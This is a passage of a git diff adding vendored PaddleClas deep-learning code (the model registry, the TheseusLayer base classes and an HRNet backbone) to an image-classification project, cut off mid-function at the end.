+ print( + f"filename: {filename}, top-{topk}, {pred_str}") + + img_list = [] + img_path_list = [] + yield preds + else: + err = "Please input legal image! The type of image supported by PaddleClas are: NumPy.ndarray and string of local path or Ineternet URL" + raise ImageTypeError(err) + return + + +# for CLI +def main(): + """Function API used for commad line. + """ + cfg = args_cfg() + clas_engine = PaddleClas(**cfg) + res = clas_engine.predict(cfg["infer_imgs"], print_pred=True) + for _ in res: + pass + print("Predict complete!") + return + + +if __name__ == "__main__": + main() diff --git a/Smart_container/PaddleClas/ppcls/__init__.py b/Smart_container/PaddleClas/ppcls/__init__.py new file mode 100644 index 0000000..d6cdb6f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/__init__.py @@ -0,0 +1,20 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from . import optimizer + +from .arch import * +from .optimizer import * +from .data import * +from .utils import * diff --git a/Smart_container/PaddleClas/ppcls/arch/__init__.py b/Smart_container/PaddleClas/ppcls/arch/__init__.py new file mode 100644 index 0000000..657fa82 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/__init__.py @@ -0,0 +1,127 @@ +#copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +#Licensed under the Apache License, Version 2.0 (the "License"); +#you may not use this file except in compliance with the License. +#You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +#Unless required by applicable law or agreed to in writing, software +#distributed under the License is distributed on an "AS IS" BASIS, +#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +#See the License for the specific language governing permissions and +#limitations under the License. + +import copy +import importlib + +import paddle.nn as nn +from paddle.jit import to_static +from paddle.static import InputSpec + +from . import backbone, gears +from .backbone import * +from .gears import build_gear +from .utils import * +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer +from ppcls.utils import logger +from ppcls.utils.save_load import load_dygraph_pretrain + +__all__ = ["build_model", "RecModel", "DistillationModel"] + + +def build_model(config): + config = copy.deepcopy(config) + model_type = config.pop("name") + mod = importlib.import_module(__name__) + arch = getattr(mod, model_type)(**config) + return arch + + +def apply_to_static(config, model): + support_to_static = config['Global'].get('to_static', False) + + if support_to_static: + specs = None + if 'image_shape' in config['Global']: + specs = [InputSpec([None] + config['Global']['image_shape'])] + model = to_static(model, input_spec=specs) + logger.info("Successfully to apply @to_static with specs: {}".format( + specs)) + return model + + +class RecModel(nn.Layer): + def __init__(self, **config): + super().__init__() + backbone_config = config["Backbone"] + backbone_name = backbone_config.pop("name") + self.backbone = eval(backbone_name)(**backbone_config) + if "BackboneStopLayer" in config: + backbone_stop_layer = config["BackboneStopLayer"]["name"] + self.backbone.stop_after(backbone_stop_layer) + + if "Neck" in config: + self.neck = build_gear(config["Neck"]) + else: + self.neck = None + + if "Head" in config: + self.head = build_gear(config["Head"]) + else: + self.head = None + + def forward(self, x, label=None): + x = self.backbone(x) + if self.neck is not None: + x = self.neck(x) + if self.head is not None: + y = self.head(x, label) + else: + y = None + return {"features": x, "logits": y} + + +class DistillationModel(nn.Layer): + def __init__(self, + models=None, + pretrained_list=None, + freeze_params_list=None, + **kargs): + super().__init__() + assert isinstance(models, list) + self.model_list = [] + self.model_name_list = [] + if pretrained_list is not None: + assert len(pretrained_list) == len(models) + + if freeze_params_list is None: + freeze_params_list = [False] * len(models) + assert len(freeze_params_list) == len(models) + for idx, model_config in enumerate(models): + assert len(model_config) == 1 + key = list(model_config.keys())[0] + model_config = model_config[key] + model_name = model_config.pop("name") + model = eval(model_name)(**model_config) + + if freeze_params_list[idx]: + for param in model.parameters(): + param.trainable = False + self.model_list.append(self.add_sublayer(key, model)) + self.model_name_list.append(key) + + if pretrained_list is not None: + for idx, pretrained in enumerate(pretrained_list): + if pretrained is not None: + load_dygraph_pretrain( + self.model_name_list[idx], path=pretrained) + + def forward(self, x, label=None): + result_dict = dict() + for idx, model_name in enumerate(self.model_name_list): + if label is None: + result_dict[model_name] = self.model_list[idx](x) + else: + result_dict[model_name] = self.model_list[idx](x, label) + return result_dict diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/__init__.py b/Smart_container/PaddleClas/ppcls/arch/backbone/__init__.py new file mode 100644 index 0000000..d2efcdc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/__init__.py @@ -0,0 +1,77 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import sys +import inspect + +from ppcls.arch.backbone.legendary_models.mobilenet_v1 import MobileNetV1_x0_25, MobileNetV1_x0_5, MobileNetV1_x0_75, MobileNetV1 +from ppcls.arch.backbone.legendary_models.mobilenet_v3 import MobileNetV3_small_x0_35, MobileNetV3_small_x0_5, MobileNetV3_small_x0_75, MobileNetV3_small_x1_0, MobileNetV3_small_x1_25, MobileNetV3_large_x0_35, MobileNetV3_large_x0_5, MobileNetV3_large_x0_75, MobileNetV3_large_x1_0, MobileNetV3_large_x1_25 +from ppcls.arch.backbone.legendary_models.resnet import ResNet18, ResNet18_vd, ResNet34, ResNet34_vd, ResNet50, ResNet50_vd, ResNet101, ResNet101_vd, ResNet152, ResNet152_vd, ResNet200_vd +from ppcls.arch.backbone.legendary_models.vgg import VGG11, VGG13, VGG16, VGG19 +from ppcls.arch.backbone.legendary_models.inception_v3 import InceptionV3 +from ppcls.arch.backbone.legendary_models.hrnet import HRNet_W18_C, HRNet_W30_C, HRNet_W32_C, HRNet_W40_C, HRNet_W44_C, HRNet_W48_C, HRNet_W60_C, HRNet_W64_C, SE_HRNet_W64_C +from ppcls.arch.backbone.legendary_models.pp_lcnet import PPLCNet_x0_25, PPLCNet_x0_35, PPLCNet_x0_5, PPLCNet_x0_75, PPLCNet_x1_0, PPLCNet_x1_5, PPLCNet_x2_0, PPLCNet_x2_5 + +from ppcls.arch.backbone.model_zoo.resnet_vc import ResNet50_vc +from ppcls.arch.backbone.model_zoo.resnext import ResNeXt50_32x4d, ResNeXt50_64x4d, ResNeXt101_32x4d, ResNeXt101_64x4d, ResNeXt152_32x4d, ResNeXt152_64x4d +from ppcls.arch.backbone.model_zoo.resnext_vd import ResNeXt50_vd_32x4d, ResNeXt50_vd_64x4d, ResNeXt101_vd_32x4d, ResNeXt101_vd_64x4d, ResNeXt152_vd_32x4d, ResNeXt152_vd_64x4d +from ppcls.arch.backbone.model_zoo.res2net import Res2Net50_26w_4s, Res2Net50_14w_8s +from ppcls.arch.backbone.model_zoo.res2net_vd import Res2Net50_vd_26w_4s, Res2Net101_vd_26w_4s, Res2Net200_vd_26w_4s +from ppcls.arch.backbone.model_zoo.se_resnet_vd import SE_ResNet18_vd, SE_ResNet34_vd, SE_ResNet50_vd +from ppcls.arch.backbone.model_zoo.se_resnext_vd import SE_ResNeXt50_vd_32x4d, SE_ResNeXt50_vd_32x4d, SENet154_vd +from ppcls.arch.backbone.model_zoo.se_resnext import SE_ResNeXt50_32x4d, SE_ResNeXt101_32x4d, SE_ResNeXt152_64x4d +from ppcls.arch.backbone.model_zoo.dpn import DPN68, DPN92, DPN98, DPN107, DPN131 +from ppcls.arch.backbone.model_zoo.densenet import DenseNet121, DenseNet161, DenseNet169, DenseNet201, DenseNet264 +from ppcls.arch.backbone.model_zoo.efficientnet import EfficientNetB0, EfficientNetB1, EfficientNetB2, EfficientNetB3, EfficientNetB4, EfficientNetB5, EfficientNetB6, EfficientNetB7, EfficientNetB0_small +from ppcls.arch.backbone.model_zoo.resnest import ResNeSt50_fast_1s1x64d, ResNeSt50, ResNeSt101 +from ppcls.arch.backbone.model_zoo.googlenet import GoogLeNet +from ppcls.arch.backbone.model_zoo.mobilenet_v2 import MobileNetV2_x0_25, MobileNetV2_x0_5, MobileNetV2_x0_75, MobileNetV2, MobileNetV2_x1_5, MobileNetV2_x2_0 +from ppcls.arch.backbone.model_zoo.shufflenet_v2 import ShuffleNetV2_x0_25, ShuffleNetV2_x0_33, ShuffleNetV2_x0_5, ShuffleNetV2_x1_0, ShuffleNetV2_x1_5, ShuffleNetV2_x2_0, ShuffleNetV2_swish +from ppcls.arch.backbone.model_zoo.ghostnet import GhostNet_x0_5, GhostNet_x1_0, GhostNet_x1_3 +from ppcls.arch.backbone.model_zoo.alexnet import AlexNet +from ppcls.arch.backbone.model_zoo.inception_v4 import InceptionV4 +from ppcls.arch.backbone.model_zoo.xception import Xception41, Xception65, Xception71 +from ppcls.arch.backbone.model_zoo.xception_deeplab import Xception41_deeplab, Xception65_deeplab +from ppcls.arch.backbone.model_zoo.resnext101_wsl import ResNeXt101_32x8d_wsl, ResNeXt101_32x16d_wsl, ResNeXt101_32x32d_wsl, ResNeXt101_32x48d_wsl +from ppcls.arch.backbone.model_zoo.squeezenet import SqueezeNet1_0, SqueezeNet1_1 +from ppcls.arch.backbone.model_zoo.darknet import DarkNet53 +from ppcls.arch.backbone.model_zoo.regnet import RegNetX_200MF, RegNetX_4GF, RegNetX_32GF, RegNetY_200MF, RegNetY_4GF, RegNetY_32GF +from ppcls.arch.backbone.model_zoo.vision_transformer import ViT_small_patch16_224, ViT_base_patch16_224, ViT_base_patch16_384, ViT_base_patch32_384, ViT_large_patch16_224, ViT_large_patch16_384, ViT_large_patch32_384, ViT_huge_patch16_224, ViT_huge_patch32_384 +from ppcls.arch.backbone.model_zoo.distilled_vision_transformer import DeiT_tiny_patch16_224, DeiT_small_patch16_224, DeiT_base_patch16_224, DeiT_tiny_distilled_patch16_224, DeiT_small_distilled_patch16_224, DeiT_base_distilled_patch16_224, DeiT_base_patch16_384, DeiT_base_distilled_patch16_384 +from ppcls.arch.backbone.model_zoo.swin_transformer import SwinTransformer_tiny_patch4_window7_224, SwinTransformer_small_patch4_window7_224, SwinTransformer_base_patch4_window7_224, SwinTransformer_base_patch4_window12_384, SwinTransformer_large_patch4_window7_224, SwinTransformer_large_patch4_window12_384 +from ppcls.arch.backbone.model_zoo.mixnet import MixNet_S, MixNet_M, MixNet_L +from ppcls.arch.backbone.model_zoo.rexnet import ReXNet_1_0, ReXNet_1_3, ReXNet_1_5, ReXNet_2_0, ReXNet_3_0 +from ppcls.arch.backbone.model_zoo.gvt import pcpvt_small, pcpvt_base, pcpvt_large, alt_gvt_small, alt_gvt_base, alt_gvt_large +from ppcls.arch.backbone.model_zoo.levit import LeViT_128S, LeViT_128, LeViT_192, LeViT_256, LeViT_384 +from ppcls.arch.backbone.model_zoo.dla import DLA34, DLA46_c, DLA46x_c, DLA60, DLA60x, DLA60x_c, DLA102, DLA102x, DLA102x2, DLA169 +from ppcls.arch.backbone.model_zoo.rednet import RedNet26, RedNet38, RedNet50, RedNet101, RedNet152 +from ppcls.arch.backbone.model_zoo.tnt import TNT_small +from ppcls.arch.backbone.model_zoo.hardnet import HarDNet68, HarDNet85, HarDNet39_ds, HarDNet68_ds +from ppcls.arch.backbone.variant_models.resnet_variant import ResNet50_last_stage_stride1 +from ppcls.arch.backbone.variant_models.vgg_variant import VGG19Sigmoid + + +def get_apis(): + current_func = sys._getframe().f_code.co_name + current_module = sys.modules[__name__] + api = [] + for _, obj in inspect.getmembers(current_module, + inspect.isclass) + inspect.getmembers( + current_module, inspect.isfunction): + api.append(obj.__name__) + api.remove(current_func) + return api + + +__all__ = get_apis() diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/base/__init__.py b/Smart_container/PaddleClas/ppcls/arch/backbone/base/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/base/theseus_layer.py b/Smart_container/PaddleClas/ppcls/arch/backbone/base/theseus_layer.py new file mode 100644 index 0000000..35eac5f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/base/theseus_layer.py @@ -0,0 +1,130 @@ +from abc import ABC +from paddle import nn +import re + + +class Identity(nn.Layer): + def __init__(self): + super(Identity, self).__init__() + + def forward(self, inputs): + return inputs + + +class TheseusLayer(nn.Layer): + def __init__(self, *args, **kwargs): + super(TheseusLayer, self).__init__() + self.res_dict = {} + + # stop doesn't work when stop layer has a parallel branch. + def stop_after(self, stop_layer_name: str): + after_stop = False + for layer_i in self._sub_layers: + if after_stop: + self._sub_layers[layer_i] = Identity() + continue + layer_name = self._sub_layers[layer_i].full_name() + if layer_name == stop_layer_name: + after_stop = True + continue + if isinstance(self._sub_layers[layer_i], TheseusLayer): + after_stop = self._sub_layers[layer_i].stop_after( + stop_layer_name) + return after_stop + + def update_res(self, return_patterns): + if not return_patterns or isinstance(self, WrapLayer): + return + for layer_i in self._sub_layers: + layer_name = self._sub_layers[layer_i].full_name() + if isinstance(self._sub_layers[layer_i], (nn.Sequential, nn.LayerList)): + self._sub_layers[layer_i] = wrap_theseus(self._sub_layers[layer_i], self.res_dict) + self._sub_layers[layer_i].update_res(return_patterns) + else: + for return_pattern in return_patterns: + if re.match(return_pattern, layer_name): + if not isinstance(self._sub_layers[layer_i], TheseusLayer): + self._sub_layers[layer_i] = wrap_theseus(self._sub_layers[layer_i], self.res_dict) + else: + self._sub_layers[layer_i].res_dict = self.res_dict + + self._sub_layers[layer_i].register_forward_post_hook( + self._sub_layers[layer_i]._save_sub_res_hook) + if isinstance(self._sub_layers[layer_i], TheseusLayer): + self._sub_layers[layer_i].res_dict = self.res_dict + self._sub_layers[layer_i].update_res(return_patterns) + + def _save_sub_res_hook(self, layer, input, output): + self.res_dict[layer.full_name()] = output + + def _return_dict_hook(self, layer, input, output): + res_dict = {"output": output} + for res_key in list(self.res_dict): + res_dict[res_key] = self.res_dict.pop(res_key) + return res_dict + + def replace_sub(self, layer_name_pattern, replace_function, recursive=True): + for layer_i in self._sub_layers: + layer_name = self._sub_layers[layer_i].full_name() + if re.match(layer_name_pattern, layer_name): + self._sub_layers[layer_i] = replace_function(self._sub_layers[layer_i]) + if recursive: + if isinstance(self._sub_layers[layer_i], TheseusLayer): + self._sub_layers[layer_i].replace_sub( + layer_name_pattern, replace_function, recursive) + elif isinstance(self._sub_layers[layer_i], (nn.Sequential, nn.LayerList)): + for layer_j in self._sub_layers[layer_i]._sub_layers: + self._sub_layers[layer_i]._sub_layers[layer_j].replace_sub( + layer_name_pattern, replace_function, recursive) + + ''' + example of replace function: + def replace_conv(origin_conv: nn.Conv2D): + new_conv = nn.Conv2D( + in_channels=origin_conv._in_channels, + out_channels=origin_conv._out_channels, + kernel_size=origin_conv._kernel_size, + stride=2 + ) + return new_conv + + ''' + + +class WrapLayer(TheseusLayer): + def __init__(self, sub_layer, res_dict=None): + super(WrapLayer, self).__init__() + self.sub_layer = sub_layer + self.name = sub_layer.full_name() + if res_dict is not None: + self.res_dict = res_dict + + def full_name(self): + return self.name + + def forward(self, *inputs, **kwargs): + return self.sub_layer(*inputs, **kwargs) + + def update_res(self, return_patterns): + if not return_patterns or not isinstance(self.sub_layer, (nn.Sequential, nn.LayerList)): + return + for layer_i in self.sub_layer._sub_layers: + if isinstance(self.sub_layer._sub_layers[layer_i], (nn.Sequential, nn.LayerList)): + self.sub_layer._sub_layers[layer_i] = wrap_theseus(self.sub_layer._sub_layers[layer_i], self.res_dict) + self.sub_layer._sub_layers[layer_i].update_res(return_patterns) + elif isinstance(self.sub_layer._sub_layers[layer_i], TheseusLayer): + self.sub_layer._sub_layers[layer_i].res_dict = self.res_dict + + layer_name = self.sub_layer._sub_layers[layer_i].full_name() + for return_pattern in return_patterns: + if re.match(return_pattern, layer_name): + self.sub_layer._sub_layers[layer_i].register_forward_post_hook( + self._sub_layers[layer_i]._save_sub_res_hook) + + if isinstance(self.sub_layer._sub_layers[layer_i], TheseusLayer): + self.sub_layer._sub_layers[layer_i].update_res(return_patterns) + + +def wrap_theseus(sub_layer, res_dict=None): + wrapped_layer = WrapLayer(sub_layer, res_dict) + return wrapped_layer diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/__init__.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/__init__.py new file mode 100644 index 0000000..1f837da --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/__init__.py @@ -0,0 +1,6 @@ +from .resnet import ResNet18, ResNet34, ResNet50, ResNet101, ResNet152, ResNet18_vd, ResNet34_vd, ResNet50_vd, ResNet101_vd, ResNet152_vd +from .hrnet import HRNet_W18_C, HRNet_W30_C, HRNet_W32_C, HRNet_W40_C, HRNet_W44_C, HRNet_W48_C, HRNet_W64_C +from .mobilenet_v1 import MobileNetV1_x0_25, MobileNetV1_x0_5, MobileNetV1_x0_75, MobileNetV1 +from .mobilenet_v3 import MobileNetV3_small_x0_35, MobileNetV3_small_x0_5, MobileNetV3_small_x0_75, MobileNetV3_small_x1_0, MobileNetV3_small_x1_25, MobileNetV3_large_x0_35, MobileNetV3_large_x0_5, MobileNetV3_large_x0_75, MobileNetV3_large_x1_0, MobileNetV3_large_x1_25 +from .inception_v3 import InceptionV3 +from .vgg import VGG11, VGG13, VGG16, VGG19 diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/hrnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/hrnet.py new file mode 100644 index 0000000..7c4898a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/hrnet.py @@ -0,0 +1,744 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import math +import paddle +from paddle import nn +from paddle import ParamAttr +from paddle.nn.functional import upsample +from paddle.nn.initializer import Uniform + +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer, Identity +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "HRNet_W18_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W18_C_pretrained.pdparams", + "HRNet_W30_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W30_C_pretrained.pdparams", + "HRNet_W32_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W32_C_pretrained.pdparams", + "HRNet_W40_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W40_C_pretrained.pdparams", + "HRNet_W44_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W44_C_pretrained.pdparams", + "HRNet_W48_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W48_C_pretrained.pdparams", + "HRNet_W64_C": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/HRNet_W64_C_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + + +def _create_act(act): + if act == "hardswish": + return nn.Hardswish() + elif act == "relu": + return nn.ReLU() + elif act is None: + return Identity() + else: + raise RuntimeError( + "The activation function is not supported: {}".format(act)) + + +class ConvBNLayer(TheseusLayer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + act="relu"): + super().__init__() + + self.conv = nn.Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + bias_attr=False) + self.bn = nn.BatchNorm(num_filters, act=None) + self.act = _create_act(act) + + def forward(self, x): + x = self.conv(x) + x = self.bn(x) + x = self.act(x) + return x + + +class BottleneckBlock(TheseusLayer): + def __init__(self, + num_channels, + num_filters, + has_se, + stride=1, + downsample=False): + super().__init__() + + self.has_se = has_se + self.downsample = downsample + + self.conv1 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act="relu") + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + stride=stride, + act="relu") + self.conv3 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 4, + filter_size=1, + act=None) + + if self.downsample: + self.conv_down = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 4, + filter_size=1, + act=None) + + if self.has_se: + self.se = SELayer( + num_channels=num_filters * 4, + num_filters=num_filters * 4, + reduction_ratio=16) + self.relu = nn.ReLU() + + def forward(self, x, res_dict=None): + residual = x + x = self.conv1(x) + x = self.conv2(x) + x = self.conv3(x) + if self.downsample: + residual = self.conv_down(residual) + if self.has_se: + x = self.se(x) + x = paddle.add(x=residual, y=x) + x = self.relu(x) + return x + + +class BasicBlock(nn.Layer): + def __init__(self, num_channels, num_filters, has_se=False): + super().__init__() + + self.has_se = has_se + + self.conv1 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=3, + stride=1, + act="relu") + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + stride=1, + act=None) + + if self.has_se: + self.se = SELayer( + num_channels=num_filters, + num_filters=num_filters, + reduction_ratio=16) + self.relu = nn.ReLU() + + def forward(self, x): + residual = x + x = self.conv1(x) + x = self.conv2(x) + + if self.has_se: + x = self.se(x) + + x = paddle.add(x=residual, y=x) + x = self.relu(x) + return x + + +class SELayer(TheseusLayer): + def __init__(self, num_channels, num_filters, reduction_ratio): + super().__init__() + + self.avg_pool = nn.AdaptiveAvgPool2D(1) + + self._num_channels = num_channels + + med_ch = int(num_channels / reduction_ratio) + stdv = 1.0 / math.sqrt(num_channels * 1.0) + self.fc_squeeze = nn.Linear( + num_channels, + med_ch, + weight_attr=ParamAttr(initializer=Uniform(-stdv, stdv))) + self.relu = nn.ReLU() + stdv = 1.0 / math.sqrt(med_ch * 1.0) + self.fc_excitation = nn.Linear( + med_ch, + num_filters, + weight_attr=ParamAttr(initializer=Uniform(-stdv, stdv))) + self.sigmoid = nn.Sigmoid() + + def forward(self, x, res_dict=None): + residual = x + x = self.avg_pool(x) + x = paddle.squeeze(x, axis=[2, 3]) + x = self.fc_squeeze(x) + x = self.relu(x) + x = self.fc_excitation(x) + x = self.sigmoid(x) + x = paddle.unsqueeze(x, axis=[2, 3]) + x = residual * x + return x + + +class Stage(TheseusLayer): + def __init__(self, num_modules, num_filters, has_se=False): + super().__init__() + + self._num_modules = num_modules + + self.stage_func_list = nn.LayerList() + for i in range(num_modules): + self.stage_func_list.append( + HighResolutionModule( + num_filters=num_filters, has_se=has_se)) + + def forward(self, x, res_dict=None): + x = x + for idx in range(self._num_modules): + x = self.stage_func_list[idx](x) + return x + + +class HighResolutionModule(TheseusLayer): + def __init__(self, num_filters, has_se=False): + super().__init__() + + self.basic_block_list = nn.LayerList() + + for i in range(len(num_filters)): + self.basic_block_list.append( + nn.Sequential(*[ + BasicBlock( + num_channels=num_filters[i], + num_filters=num_filters[i], + has_se=has_se) for j in range(4) + ])) + + self.fuse_func = FuseLayers( + in_channels=num_filters, out_channels=num_filters) + + def forward(self, x, res_dict=None): + out = [] + for idx, xi in enumerate(x): + basic_block_list = self.basic_block_list[idx] + for basic_block_func in basic_block_list: + xi = basic_block_func(xi) + out.append(xi) + out = self.fuse_func(out) + return out + + +class FuseLayers(TheseusLayer): + def __init__(self, in_channels, out_channels): + super().__init__() + + self._actual_ch = len(in_channels) + self._in_channels = in_channels + + self.residual_func_list = nn.LayerList() + self.relu = nn.ReLU() + for i in range(len(in_channels)): + for j in range(len(in_channels)): + if j > i: + self.residual_func_list.append( + ConvBNLayer( + num_channels=in_channels[j], + num_filters=out_channels[i], + filter_size=1, + stride=1, + act=None)) + elif j < i: + pre_num_filters = in_channels[j] + for k in range(i - j): + if k == i - j - 1: + self.residual_func_list.append( + ConvBNLayer( + num_channels=pre_num_filters, + num_filters=out_channels[i], + filter_size=3, + stride=2, + act=None)) + pre_num_filters = out_channels[i] + else: + self.residual_func_list.append( + ConvBNLayer( + num_channels=pre_num_filters, + num_filters=out_channels[j], + filter_size=3, + stride=2, + act="relu")) + pre_num_filters = out_channels[j] + + def forward(self, x, res_dict=None): + out = [] + residual_func_idx = 0 + for i in range(len(self._in_channels)): + residual = x[i] + for j in range(len(self._in_channels)): + if j > i: + xj = self.residual_func_list[residual_func_idx](x[j]) + residual_func_idx += 1 + + xj = upsample(xj, scale_factor=2**(j - i), mode="nearest") + residual = paddle.add(x=residual, y=xj) + elif j < i: + xj = x[j] + for k in range(i - j): + xj = self.residual_func_list[residual_func_idx](xj) + residual_func_idx += 1 + + residual = paddle.add(x=residual, y=xj) + + residual = self.relu(residual) + out.append(residual) + + return out + + +class LastClsOut(TheseusLayer): + def __init__(self, + num_channel_list, + has_se, + num_filters_list=[32, 64, 128, 256]): + super().__init__() + + self.func_list = nn.LayerList() + for idx in range(len(num_channel_list)): + self.func_list.append( + BottleneckBlock( + num_channels=num_channel_list[idx], + num_filters=num_filters_list[idx], + has_se=has_se, + downsample=True)) + + def forward(self, x, res_dict=None): + out = [] + for idx, xi in enumerate(x): + xi = self.func_list[idx](xi) + out.append(xi) + return out + + +class HRNet(TheseusLayer): + """ + HRNet + Args: + width: int=18. Base channel number of HRNet. + has_se: bool=False. If 'True', add se module to HRNet. + class_num: int=1000. Output num of last fc layer. + Returns: + model: nn.Layer. Specific HRNet model depends on args. + """ + + def __init__(self, width=18, has_se=False, class_num=1000, return_patterns=None): + super().__init__() + + self.width = width + self.has_se = has_se + self._class_num = class_num + + channels_2 = [self.width, self.width * 2] + channels_3 = [self.width, self.width * 2, self.width * 4] + channels_4 = [ + self.width, self.width * 2, self.width * 4, self.width * 8 + ] + + self.conv_layer1_1 = ConvBNLayer( + num_channels=3, + num_filters=64, + filter_size=3, + stride=2, + act="relu") + + self.conv_layer1_2 = ConvBNLayer( + num_channels=64, + num_filters=64, + filter_size=3, + stride=2, + act="relu") + + self.layer1 = nn.Sequential(*[ + BottleneckBlock( + num_channels=64 if i == 0 else 256, + num_filters=64, + has_se=has_se, + stride=1, + downsample=True if i == 0 else False) for i in range(4) + ]) + + self.conv_tr1_1 = ConvBNLayer( + num_channels=256, num_filters=width, filter_size=3) + self.conv_tr1_2 = ConvBNLayer( + num_channels=256, num_filters=width * 2, filter_size=3, stride=2) + + self.st2 = Stage( + num_modules=1, num_filters=channels_2, has_se=self.has_se) + + self.conv_tr2 = ConvBNLayer( + num_channels=width * 2, + num_filters=width * 4, + filter_size=3, + stride=2) + self.st3 = Stage( + num_modules=4, num_filters=channels_3, has_se=self.has_se) + + self.conv_tr3 = ConvBNLayer( + num_channels=width * 4, + num_filters=width * 8, + filter_size=3, + stride=2) + + self.st4 = Stage( + num_modules=3, num_filters=channels_4, has_se=self.has_se) + + # classification + num_filters_list = [32, 64, 128, 256] + self.last_cls = LastClsOut( + num_channel_list=channels_4, + has_se=self.has_se, + num_filters_list=num_filters_list) + + last_num_filters = [256, 512, 1024] + self.cls_head_conv_list = nn.LayerList() + for idx in range(3): + self.cls_head_conv_list.append( + ConvBNLayer( + num_channels=num_filters_list[idx] * 4, + num_filters=last_num_filters[idx], + filter_size=3, + stride=2)) + + self.conv_last = ConvBNLayer( + num_channels=1024, num_filters=2048, filter_size=1, stride=1) + + self.avg_pool = nn.AdaptiveAvgPool2D(1) + + stdv = 1.0 / math.sqrt(2048 * 1.0) + + self.fc = nn.Linear( + 2048, + class_num, + weight_attr=ParamAttr(initializer=Uniform(-stdv, stdv))) + if return_patterns is not None: + self.update_res(return_patterns) + self.register_forward_post_hook(self._return_dict_hook) + + def forward(self, x): + x = self.conv_layer1_1(x) + x = self.conv_layer1_2(x) + + x = self.layer1(x) + + tr1_1 = self.conv_tr1_1(x) + tr1_2 = self.conv_tr1_2(x) + x = self.st2([tr1_1, tr1_2]) + + tr2 = self.conv_tr2(x[-1]) + x.append(tr2) + x = self.st3(x) + + tr3 = self.conv_tr3(x[-1]) + x.append(tr3) + x = self.st4(x) + + x = self.last_cls(x) + + y = x[0] + for idx in range(3): + y = paddle.add(x[idx + 1], self.cls_head_conv_list[idx](y)) + + y = self.conv_last(y) + y = self.avg_pool(y) + y = paddle.reshape(y, shape=[-1, y.shape[1]]) + y = self.fc(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def HRNet_W18_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W18_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W18_C` model depends on args. + """ + model = HRNet(width=18, **kwargs) + 